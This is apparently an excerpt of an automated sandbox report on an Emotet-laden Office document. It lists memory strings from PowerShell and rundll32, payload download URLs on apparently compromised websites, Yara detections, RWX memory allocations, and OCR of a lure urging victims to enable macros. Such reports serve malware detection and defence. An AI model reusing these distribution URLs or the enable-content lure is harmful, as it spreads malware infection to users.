                      Source: powershell.exe, 00000005.00000002.2094681910.00000000021D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116652511.00000000027F0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: rundll32.exe, 00000006.00000002.2109180444.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107856100.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116302224.0000000002327000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125810547.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2136021936.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2098563599.0000000003AAA000.00000004.00000001.sdmpString found in binary or memory: http://silkonbusiness.matrixinfotechsolu
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://silkonbusiness.matrixinfotechsolution.com
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2098478813.0000000003985000.00000004.00000001.sdmpString found in binary or memory: http://silkonbusiness.matrixinfotechsolution.com/js/q26/
                      Source: rundll32.exe, 00000006.00000002.2109180444.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107856100.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116302224.0000000002327000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125810547.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2136021936.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2094681910.00000000021D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116652511.00000000027F0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: rundll32.exe, 00000006.00000002.2108743988.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107723708.0000000001F50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116055655.0000000002140000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125487050.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: rundll32.exe, 00000006.00000002.2109180444.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107856100.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116302224.0000000002327000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125810547.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2136021936.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: rundll32.exe, 00000006.00000002.2108743988.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107723708.0000000001F50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116055655.0000000002140000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125487050.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000002.2093673054.0000000000284000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.c3#
                      Source: powershell.exe, 00000005.00000002.2093673054.0000000000284000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/
                      Source: powershell.exe, 00000005.00000002.2093673054.0000000000284000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
                      Source: rundll32.exe, 0000000A.00000002.2135841154.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: https://api.w.org/
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: https://armakonarms.com/
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: https://armakonarms.com/brands/
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: https://armakonarms.com/comments/feed/
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: https://armakonarms.com/feed/
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: https://armakonarms.com/iletisim/
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: https://armakonarms.com/urun-kategori/pump-action-2/
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: https://armakonarms.com/urun-kategori/semi-auto/
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: https://armakonarms.com/urun-kategori/short-pump-action/
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: https://armakonarms.com/wp-content/uploads/2020/11/winmark-100x100.png
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: https://armakonarms.com/wp-content/uploads/2020/11/winmark.png
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: https://armakonarms.com/wp-content/uploads/2021/01/armakon.png
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: https://armakonarms.com/wp-json/
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: https://armakonarms.com/xmlrpc.php?rsd
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: https://bbjugueteria.com
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2098478813.0000000003985000.00000004.00000001.sdmpString found in binary or memory: https://bbjugueteria.com/s6kscx/Z/
                      Source: powershell.exe, 00000005.00000002.2098563599.0000000003AAA000.00000004.00000001.sdmpString found in binary or memory: https://bbjugueteria.comh
                      Source: powershell.exe, 00000005.00000002.2097744742.00000000030F8000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: https://www.bimception.com
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2098478813.0000000003985000.00000004.00000001.sdmpString found in binary or memory: https://www.bimception.com/wp-admin/sHy5t/
                      Source: powershell.exe, 00000005.00000002.2098563599.0000000003AAA000.00000004.00000001.sdmpString found in binary or memory: https://www.bimception.comhrsZ
                      Source: powershell.exe, 00000005.00000002.2098563599.0000000003AAA000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2098550728.0000000003A8E000.00000004.00000001.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000009.00000002.2125452150.0000000000690000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2188345600.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2207082899.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2149603848.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2187673787.0000000000150000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2207752996.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2125404655.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2176671171.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2339396360.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2107659481.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2158799762.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2115709278.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2197495102.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2226062410.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2176658564.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2207040108.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2138353893.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2166530116.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2147996106.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2148213455.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2135403936.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2218991532.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2119181462.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2217422949.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2180490151.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2166511135.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2341403788.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2339372095.0000000000150000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2157690183.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2107638490.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2217659193.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2126211663.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2226800833.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2108176213.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2199714499.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2197524650.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2226045292.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2135436680.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2167094683.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2187719578.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2115685260.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2157667927.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 9.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.690000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.690000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.230000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
                      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available fOr protected documents. You have to press "E
                      Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 8,236 N@m 13 ;a 1009
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document
                      Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available fOr protected documents. You have to press "ENA
                      Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5329
                      Source: unknownProcess created: Commandline size = 5228
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5228Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Psyzc\Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FF00252E055_2_000007FF00252E05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B0D57_2_1001B0D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000DBB27_2_1000DBB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100146027_2_10014602
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100028147_2_10002814
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001821E7_2_1001821E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018A247_2_10018A24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DA277_2_1001DA27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A82A7_2_1000A82A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B22A7_2_1000B22A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000422B7_2_1000422B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A02C7_2_1001A02C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A82C7_2_1001A82C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E42E7_2_1000E42E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000BA467_2_1000BA46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F2497_2_1000F249
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018C4D7_2_10018C4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001505A7_2_1001505A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100016627_2_10001662
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100016647_2_10001664
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D87D7_2_1001D87D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100100827_2_10010082
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E6897_2_1001E689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100184897_2_10018489
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002C937_2_10002C93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100114947_2_10011494
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000AE9E7_2_1000AE9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100026A07_2_100026A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008EA17_2_10008EA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100112B37_2_100112B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E0B67_2_1001E0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000BEBD7_2_1000BEBD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100048C77_2_100048C7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004AD37_2_10004AD3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100068D87_2_100068D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100084D87_2_100084D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100042DE7_2_100042DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E4E17_2_1001E4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010CE07_2_10010CE0
